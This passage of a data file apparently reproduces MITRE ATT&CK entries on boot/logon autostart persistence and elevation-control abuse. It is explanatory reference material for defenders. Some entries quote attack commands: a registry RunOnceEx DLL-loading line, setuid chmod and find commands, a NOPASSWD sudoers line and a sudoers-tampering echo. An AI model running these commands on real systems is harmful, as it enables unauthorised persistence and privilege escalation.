                          'repositories that store configuration information, such as the Windows Registry. An '
                          'adversary may achieve the same goal by modifying or extending features of the kernel.\n'
                          '\n'
                          'Since some boot or logon autostart programs run with higher privileges, an adversary may '
                          'leverage these to elevate privileges.',
           'name': 'Boot or Logon Autostart Execution',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1547.001': {'attack_id': 'T1547.001',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may achieve persistence by adding a program to a startup folder or '
                              'referencing it with a Registry run key. Adding an entry to the "run keys" in the '
                              'Registry or startup folder will cause the program referenced to be executed when a user '
                              'logs in.(Citation: Microsoft Run Key) These programs will be executed under the context '
                              "of the user and will have the account's associated permissions level.\n"
                              '\n'
                              'The following run keys are created by default on Windows systems:\n'
                              '\n'
                              '* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n'
                              '* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n'
                              '\n'
                              'Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node '
                              '2018)(Citation: Malwarebytes Wow6432Node 2016) The '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> '
                              'is also available but is not created by default on Windows Vista and newer. Registry '
                              'run key entries can reference programs directly or list them as a dependency.(Citation: '
                              'Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" '
                              'key with RunOnceEx: <code>reg add '
                              'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d '
                              '"C:\\temp\\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n'
                              '\n'
                              'Placing a program within a startup folder will also cause that program to execute when '
                              'a user logs in. There is a startup folder location for individual user accounts as well '
                              'as a system-wide startup folder that will be checked regardless of which user account '
                              'logs in. The startup folder path for the current user is '
                              '<code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start '
                              'Menu\\Programs\\Startup</code>. The startup folder path for all users is '
                              '<code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n'
                              '\n'
                              'The following Registry keys can be used to set startup folder items for persistence:\n'
                              '\n'
                              '* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User '
                              'Shell Folders</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell '
                              'Folders</code>\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell '
                              'Folders</code>\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User '
                              'Shell Folders</code>\n'
                              '\n'
                              'The following Registry keys can control automatic startup of services during boot:\n'
                              '\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n'
                              '\n'
                              'Using policy settings to specify startup programs creates corresponding values in '
                              'either of two Registry keys:\n'
                              '\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n'
                              '\n'
                              'Programs listed in the load value of the registry key '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Windows</code> run automatically for the currently logged-on user.\n'
                              '\n'
                              'By default, the multistring <code>BootExecute</code> value of the registry key '
                              '<code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is '
                              'set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to '
                              'check the file-system integrity of the hard disks if the system has been shut down '
                              'abnormally. Adversaries can add other programs or processes to this registry value '
                              'which will automatically launch at boot.\n'
                              '\n'
                              'Adversaries can use these configuration locations to execute malware, such as remote '
                              'access tools, to maintain persistence through system reboots. Adversaries may also use '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries '
                              'look as if they are associated with legitimate programs.',
               'name': 'Registry Run Keys / Startup Folder',
               'platforms': ['Windows']},
 'T1547.002': {'attack_id': 'T1547.002',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse authentication packages to execute DLLs when the system boots. '
                              'Windows authentication package DLLs are loaded by the Local Security Authority (LSA) '
                              'process at system start. They provide support for multiple logon processes and multiple '
                              'security protocols to the operating system.(Citation: MSDN Authentication Packages)\n'
                              '\n'
                              'Adversaries can use the autostart mechanism provided by LSA authentication packages for '
                              'persistence by placing a reference to a binary in the Windows Registry location '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\</code> with the key value of '
                              '<code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be '
                              'executed by the system when the authentication packages are loaded.',
               'name': 'Authentication Package',
               'platforms': ['Windows']},
 'T1547.003': {'attack_id': 'T1547.003',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse time providers to execute DLLs when the system boots. The Windows '
                              'Time service (W32Time) enables time synchronization across and within '
                              'domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible '
                              'for retrieving time stamps from hardware/network resources and outputting these values '
                              'to other network clients.(Citation: Microsoft TimeProvider)\n'
                              '\n'
                              'Time providers are implemented as dynamic-link libraries (DLLs) that are registered in '
                              'the subkeys of '
                              '`HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\`.(Citation: '
                              'Microsoft TimeProvider) The time provider manager, directed by the service control '
                              'manager, loads and starts time providers listed and enabled under this key at system '
                              'startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)\n'
                              '\n'
                              'Adversaries may abuse this architecture to establish persistence, specifically by '
                              'creating a new arbitrarily named subkey  pointing to a malicious DLL in the `DllName` '
                              'value. Administrator privileges are required for time provider registration, though '
                              'execution will run in context of the Local Service account.(Citation: Github W32Time '
                              'Oct 2017)',
               'name': 'Time Providers',
               'platforms': ['Windows']},
 'T1547.004': {'attack_id': 'T1547.004',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a '
                              'user logs in. Winlogon.exe is a Windows component responsible for actions at '
                              'logon/logoff as well as the secure attention sequence (SAS) triggered by '
                              'Ctrl-Alt-Delete. Registry entries in '
                              '<code>HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper programs and '
                              'functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) \n'
                              '\n'
                              'Malicious modifications to these Registry keys may cause Winlogon to load and execute '
                              'malicious DLLs and/or executables. Specifically, the following subkeys have been known '
                              'to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n'
                              '\n'
                              '* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n'
                              '* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed '
                              'when a user logs on\n'
                              '* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs '
                              'on\n'
                              '\n'
                              'Adversaries may take advantage of these features to repeatedly execute malicious code '
                              'and establish persistence.',
               'name': 'Winlogon Helper DLL',
               'platforms': ['Windows']},
 'T1547.005': {'attack_id': 'T1547.005',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse security support providers (SSPs) to execute DLLs when the system '
                              'boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at '
                              'system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext '
                              "passwords that are stored in Windows, such as any logged-on user's Domain password or "
                              'smart card PINs.\n'
                              '\n'
                              'The SSP configuration is stored in two Registry keys: '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security '
                              'Packages</code>. An adversary may modify these Registry keys to add new SSPs, which '
                              'will be loaded the next time the system boots, or when the AddSecurityPackage Windows '
                              'API function is called.(Citation: Graeber 2014)',
               'name': 'Security Support Provider',
               'platforms': ['Windows']},
 'T1547.006': {'attack_id': 'T1547.006',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may modify the kernel to automatically execute programs on system boot. '
                              'Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into '
                              'the kernel upon demand. They extend the functionality of the kernel without the need to '
                              'reboot the system. For example, one type of module is the device driver, which allows '
                              'the kernel to access hardware connected to the system.(Citation: Linux Kernel '
                              'Programming)\xa0\n'
                              '\n'
                              'When used maliciously, LKMs can be a type of kernel-mode '
                              '[Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest '
                              'operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming '
                              'Guide)\xa0Common features of LKM based rootkits include: hiding itself, selective '
                              'hiding of files, processes and network activity, as well as log tampering, providing '
                              'authenticated backdoors, and enabling root access to non-privileged users.(Citation: '
                              'iDefense Rootkit Overview)\n'
                              '\n'
                              'Kernel extensions, also called kext, are used in macOS to load functionality onto a '
                              'system similar to LKMs for Linux. Since the kernel is responsible for enforcing '
                              'security and the kernel extensions run as apart of the kernel, kexts are not governed '
                              'by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> '
                              'and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that '
                              'is granted privileges by Apple allowing it to sign Kernel extensions. Developers '
                              'without these privileges may still sign kexts but they will not load unless SIP is '
                              'disabled. If SIP is enabled, the kext signature is verified before being added to the '
                              'AuxKC.(Citation: System and kernel extensions in macOS)\n'
                              '\n'
                              'Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System '
                              'Extensions. However, kexts are still allowed as "Legacy System Extensions" since there '
                              'is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel '
                              'Extension Deprecation)\n'
                              '\n'
                              'Adversaries can use LKMs and kexts to conduct '
                              '[Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege '
                              'Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been '
                              'found in the wild, and there are some relevant open source projects as well.(Citation: '
                              'Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub '
                              'Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick '
                              'Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist '
                              'Ventir)(Citation: Trend Micro Skidmap)',
               'name': 'Kernel Modules and Extensions',
               'platforms': ['macOS', 'Linux']},
 'T1547.007': {'attack_id': 'T1547.007',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may modify plist files to automatically run an application when a user logs '
                              'in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a '
                              'prompt is provided to the user with a checkbox to "Reopen windows when logging back '
                              'in".(Citation: Re-Open windows on Mac) When selected, all applications currently open '
                              'are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> '
                              'within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of '
                              'Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in '
                              'this file are automatically reopened upon the user’s next logon.\n'
                              '\n'
                              'Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by '
                              'adding a malicious application path to the '
                              '<code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user '
                              'logs in.',
               'name': 'Re-opened Applications',
               'platforms': ['macOS']},
 'T1547.008': {'attack_id': 'T1547.008',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may modify or add LSASS drivers to obtain persistence on compromised '
                              'systems. The Windows security subsystem is a set of components that manage and enforce '
                              'the security policy for a computer or domain. The Local Security Authority (LSA) is the '
                              'main component responsible for local security policy and user authentication. The LSA '
                              'includes multiple dynamic link libraries (DLLs) associated with various other security '
                              'functions, all of which run in the context of the LSA Subsystem Service (LSASS) '
                              'lsass.exe process.(Citation: Microsoft Security Subsystem)\n'
                              '\n'
                              'Adversaries may target LSASS drivers to obtain persistence. By either replacing or '
                              'adding illegitimate drivers (e.g., [Hijack Execution '
                              'Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations '
                              'to continuously execute malicious payloads.',
               'name': 'LSASS Driver',
               'platforms': ['Windows']},
 'T1547.009': {'attack_id': 'T1547.009',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify shortcuts that can execute a program during system '
                              'boot or user login. Shortcuts or symbolic links are used to reference other files or '
                              'programs that will be opened or executed when the shortcut is clicked or executed by a '
                              'system startup process.\n'
                              '\n'
                              'Adversaries may abuse shortcuts in the startup folder to execute their tools and '
                              'achieve persistence.(Citation: Shortcut for Persistence ) Although often used as '
                              'payloads in an infection chain (e.g. [Spearphishing '
                              'Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also '
                              'create a new shortcut as a means of indirection, while also abusing '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious '
                              'shortcut appear as a legitimate program. Adversaries can also edit the target path or '
                              'entirely replace an existing shortcut so their malware will be executed instead of the '
                              'intended legitimate program.\n'
                              '\n'
                              'Shortcuts can also be abused to establish persistence by implementing other methods. '
                              'For example, LNK browser extensions may be modified (e.g. [Browser '
                              'Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.',
               'name': 'Shortcut Modification',
               'platforms': ['Windows']},
 'T1547.010': {'attack_id': 'T1547.010',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use port monitors to run an adversary supplied DLL during system boot '
                              'for persistence or privilege escalation. A port monitor can be set through the '
                              '<code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: '
                              'AddMonitor) This DLL can be located in <code>C:\\Windows\\System32</code> and will be '
                              'loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level '
                              'permissions on boot.(Citation: Bloxham) \n'
                              '\n'
                              'Alternatively, an arbitrary DLL can be loaded if permissions allow writing a '
                              'fully-qualified pathname for that DLL to the `Driver` value of an existing or new '
                              'arbitrarily named subkey of '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors</code>. The Registry '
                              'key contains entries for the following:\n'
                              '\n'
                              '* Local Port\n'
                              '* Standard TCP/IP Port\n'
                              '* USB Monitor\n'
                              '* WSD Port\n',
               'name': 'Port Monitors',
               'platforms': ['Windows']},
 'T1547.012': {'attack_id': 'T1547.012',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse print processors to run malicious DLLs during system boot for '
                              'persistence and/or privilege escalation. Print processors are DLLs that are loaded by '
                              'the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print '
                              'Processors)\n'
                              '\n'
                              'Adversaries may abuse the print spooler service by adding print processors that load '
                              'malicious DLLs at startup. A print processor can be installed through the '
                              '<code>AddPrintProcessor</code> API call with an account that has '
                              '<code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be '
                              'registered to the print spooler service by adding the '
                              '<code>HKLM\\SYSTEM\\\\[CurrentControlSet or '
                              'ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows '
                              'x64]\\Print Processors\\\\[user defined]\\Driver</code> Registry key that points to the '
                              'DLL.\n'
                              '\n'
                              'For the malicious print processor to be correctly installed, the payload must be '
                              'located in the dedicated system print-processor directory, that can be found with the '
                              '<code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path '
                              'from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print '
                              'processors are installed, the print spooler service, which starts during boot, must be '
                              'restarted in order for them to run.(Citation: ESET PipeMon May 2020)\n'
                              '\n'
                              'The print spooler service runs under SYSTEM level permissions, therefore print '
                              'processors installed by an adversary may run under elevated privileges.',
               'name': 'Print Processors',
               'platforms': ['Windows']},
 'T1547.013': {'attack_id': 'T1547.013',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may add or modify XDG Autostart Entries to execute malicious programs or '
                              'commands when a user’s desktop environment is loaded at login. XDG Autostart entries '
                              'are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop '
                              'Entry files (`.desktop`) to configure the user’s desktop environment upon user login. '
                              'These configuration files determine what applications launch upon user login, define '
                              'associated applications to open specific file types, and define applications used to '
                              'open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: '
                              'Free Desktop Entry Keys)\n'
                              '\n'
                              'Adversaries may abuse this feature to establish persistence by adding a path to a '
                              'malicious binary or command to the `Exec` directive in the `.desktop` configuration '
                              'file. When the user’s desktop environment is loaded at user login, the `.desktop` files '
                              'located in the XDG Autostart directories are automatically executed. System-wide '
                              'Autostart entries are located in the `/etc/xdg/autostart` directory while the user '
                              'entries are located in the `~/.config/autostart` directory.\n'
                              '\n'
                              'Adversaries may combine this technique with '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart '
                              'entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)',
               'name': 'XDG Autostart Entries',
               'platforms': ['Linux']},
 'T1547.014': {'attack_id': 'T1547.014',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may achieve persistence by adding a Registry key to the Active Setup of the '
                              'local machine. Active Setup is a Windows mechanism that is used to execute programs '
                              'when a user logs in. The value stored in the Registry key will be executed after a user '
                              'logs into the computer.(Citation: Klein Active Setup 2010) These programs will be '
                              "executed under the context of the user and will have the account's associated "
                              'permissions level.\n'
                              '\n'
                              'Adversaries may abuse Active Setup by creating a key under <code> '
                              'HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\</code> and setting a '
                              'malicious value for <code>StubPath</code>. This value will serve as the program that '
                              'will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT '
                              '2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole '
                              '2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)\n'
                              '\n'
                              'Adversaries can abuse these components to execute malware, such as remote access tools, '
                              'to maintain persistence through system reboots. Adversaries may also use '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries '
                              'look as if they are associated with legitimate programs.',
               'name': 'Active Setup',
               'platforms': ['Windows']},
 'T1547.015': {'attack_id': 'T1547.015',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may add login items to execute upon user login to gain persistence or '
                              'escalate privileges. Login items are applications, documents, folders, or server '
                              'connections that are automatically launched when a user logs in.(Citation: Open Login '
                              'Items Apple) Login items can be added via a shared file list or Service Management '
                              'Framework.(Citation: Adding Login Items) Shared file list login items can be set using '
                              'scripting languages such as '
                              '[AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service '
                              'Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.\n'
                              '\n'
                              'Login items installed using the Service Management Framework leverage '
                              '<code>launchd</code>, are not visible in the System Preferences, and can only be '
                              'removed by the application that created them.(Citation: Adding Login Items)(Citation: '
                              'SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are '
                              'visible in System Preferences, can hide the application when it launches, and are '
                              'executed through LaunchServices, not launchd, to open applications, documents, or URLs '
                              'without using Finder.(Citation: Launch Services Apple Developer) Users and applications '
                              'use login items to configure their user environment to launch commonly used services or '
                              'applications, such as email, chat, and music applications.\n'
                              '\n'
                              'Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) '
                              'and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login '
                              'item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version '
                              '10.5 on macOS, adversaries can add login items by using '
                              '[AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to '
                              'the “System Events” process, which has an AppleScript dictionary for manipulating login '
                              'items.(Citation: Login Items AE) Adversaries can use a command such as <code>tell '
                              'application “System Events” to make login item at end with properties '
                              '/path/to/executable</code>.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok '
                              'analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds '
                              'the path of the malicious executable to the login item file list located in '
                              '<code>~/Library/Application '
                              'Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.(Citation: '
                              'Startup Items Eclectic) Adversaries can also use login items to launch executables that '
                              'can be used to control the victim system remotely or as a means to gain privilege '
                              'escalation by prompting for user credentials.(Citation: objsee mac malware '
                              '2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)',
               'name': 'Login Items',
               'platforms': ['macOS']},
 'T1548': {'attack_id': 'T1548',
           'categories': ['privilege-escalation', 'defense-evasion'],
           'description': 'Adversaries may circumvent mechanisms designed to control elevate privileges to gain '
                          'higher-level permissions. Most modern systems contain native elevation control mechanisms '
                          'that are intended to limit privileges that a user can perform on a machine. Authorization '
                          'has to be granted to specific users in order to perform tasks that can be considered of '
                          'higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary '
                          'can perform several methods to take advantage of built-in control mechanisms in order to '
                          'escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)',
           'name': 'Abuse Elevation Control Mechanism',
           'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'IaaS', 'Google Workspace', 'Azure AD']},
 'T1548.001': {'attack_id': 'T1548.001',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'An adversary may abuse configurations where an application has the setuid or setgid '
                              'bits set in order to get code running in a different (and possibly more privileged) '
                              'user’s context. On Linux or macOS, when the setuid or setgid bits are set for an '
                              'application binary, the application will run with the privileges of the owning user or '
                              'group respectively.(Citation: setuid man page) Normally an application is run in the '
                              'current user’s context, regardless of which user or group owns the application. '
                              'However, there are instances where programs need to be executed in an elevated context '
                              'to function properly, but the user running them may not have the specific required '
                              'privileges.\n'
                              '\n'
                              'Instead of creating an entry in the sudoers file, which must be done by root, any user '
                              'can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux '
                              'and Mac File and Directory Permissions '
                              'Modification](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> '
                              'command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via '
                              'shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To '
                              'enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.\n'
                              '\n'
                              "Adversaries can use this mechanism on their own malware to make sure they're able to "
                              'execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse '
                              'is often part of a "shell escape" or other actions to bypass an execution environment '
                              'with restricted permissions.\n'
                              '\n'
                              'Alternatively, adversaries may choose to find and target vulnerable binaries with the '
                              'setuid or setgid bits already enabled (i.e. [File and Directory '
                              'Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are '
                              'indicated with an "s" instead of an "x" when viewing a file\'s attributes via <code>ls '
                              '-l</code>. The <code>find</code> command can also be used to search for such files. For '
                              'example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with '
                              'setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. '
                              'Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins '
                              'Suid)',
               'name': 'Setuid and Setgid',
               'platforms': ['Linux', 'macOS']},
 'T1548.002': {'attack_id': 'T1548.002',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows '
                              'User Account Control (UAC) allows a program to elevate its privileges (tracked as '
                              'integrity levels ranging from low to high) to perform a task under administrator-level '
                              'permissions, possibly by prompting the user for confirmation. The impact to the user '
                              'ranges from denying the operation under high enforcement to allowing the user to '
                              'perform the action if they are in the local administrators group and click through the '
                              'prompt or allowing them to enter an administrator password to complete the '
                              'action.(Citation: TechNet How UAC Works)\n'
                              '\n'
                              'If the UAC protection level of a computer is set to anything but the highest level, '
                              'certain Windows programs can elevate privileges or execute some elevated [Component '
                              'Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting '
                              'the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN '
                              'COM Elevation) An example of this is use of '
                              '[Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically '
                              'crafted DLL which loads an auto-elevated [Component Object '
                              'Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file '
                              'operation in a protected directory which would typically require elevated access. '
                              'Malicious software may also be injected into a trusted process to gain elevated '
                              'privileges without prompting a user.(Citation: Davidson Windows)\n'
                              '\n'
                              'Many methods have been discovered to bypass UAC. The Github readme page for UACME '
                              'contains an extensive list of methods(Citation: Github UACMe) that have been discovered '
                              'and implemented, but may not be a comprehensive list of bypasses. Additional bypass '
                              'methods are regularly discovered and some used in the wild, such as:\n'
                              '\n'
                              '* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or '
                              'script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n'
                              '\n'
                              'Another bypass is possible through some lateral movement techniques if credentials for '
                              'an account with administrator privileges are known, since UAC is a single system '
                              'security mechanism, and the privilege or integrity of a process running on one system '
                              'will be unknown on remote systems and default to high integrity.(Citation: SANS UAC '
                              'Bypass)',
               'name': 'Bypass User Account Control',
               'platforms': ['Windows']},
 'T1548.003': {'attack_id': 'T1548.003',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. '
                              'Adversaries may do this to execute commands as other users or spawn processes with '
                              'higher privileges.\n'
                              '\n'
                              'Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows '
                              'users to perform commands from terminals with elevated privileges and to control who '
                              'can perform these commands on the system. The <code>sudo</code> command "allows a '
                              'system administrator to delegate authority to give certain users (or groups of users) '
                              'the ability to run some (or all) commands as root or another user while providing an '
                              'audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since '
                              'sudo was made for the system administrator, it has some useful configuration features '
                              'such as a <code>timestamp_timeout</code>, which is the amount of time in minutes '
                              'between instances of <code>sudo</code> before it will re-prompt for a password. This is '
                              'because <code>sudo</code> has the ability to cache credentials for a period of time. '
                              'Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when '
                              'sudo was last run to determine this timeout. Additionally, there is a '
                              '<code>tty_tickets</code> variable that treats each new tty (terminal session) in '
                              'isolation. This means that, for example, the sudo timeout of one tty will not affect '
                              'another tty (you will have to type the password again).\n'
                              '\n'
                              'The sudoers file, <code>/etc/sudoers</code>, describes which users can run which '
                              'commands and from which terminals. This also describes which commands users can run as '
                              'other users or groups. This provides the principle of least privilege such that users '
                              'are running in their lowest possible permissions for most of the time and only elevate '
                              'to other users or permissions as needed, typically by prompting for a password. '
                              'However, the sudoers file can also specify when to not prompt users for passwords with '
                              'a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>.(Citation: OSX.Dok Malware) '
                              'Elevated privileges are required to edit this file though.\n'
                              '\n'
                              'Adversaries can also abuse poor configurations of these mechanisms to escalate '
                              "privileges without needing the user's password. For example, "
                              "<code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the "
                              '<code>timestamp_timeout</code> range. If it does, then malware can execute sudo '
                              "commands without needing to supply the user's password. Additional, if "
                              '<code>tty_tickets</code> is disabled, adversaries can do this from any tty for that '
                              'user.\n'
                              '\n'
                              'In the wild, malware has disabled <code>tty_tickets</code> to potentially make '
                              "scripting easier by issuing <code>echo \\'Defaults !tty_tickets\\' >> "
                              '/etc/sudoers</code>.(Citation: cybereason osx proton) In order for this change to be '
                              'reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, '
                              'the sudoers file has <code>tty_tickets</code> enabled by default.',
               'name': 'Sudo and Sudo Caching',
               'platforms': ['Linux', 'macOS']},
 'T1548.004': {'attack_id': 'T1548.004',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to '
                              'escalate privileges by prompting the user for credentials.(Citation: AppleDocs '
                              'AuthorizationExecuteWithPrivileges) The purpose of this API is to give application '
                              'developers an easy way to perform operations with root privileges, such as for '
                              'application installation or updating. This API does not validate that the program '
                              'requesting root privileges comes from a reputable source or has been maliciously '
                              'modified. \n'
                              '\n'
                              'Although this API is deprecated, it still fully functions in the latest releases of '
                              'macOS. When calling this API, the user will be prompted to enter their credentials but '
                              'no checks on the origin or integrity of the program are made. The program calling the '
                              'API may also load world writable files which can be modified to perform malicious '
                              'behavior with elevated privileges.\n'
                              '\n'
                              'Adversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root '
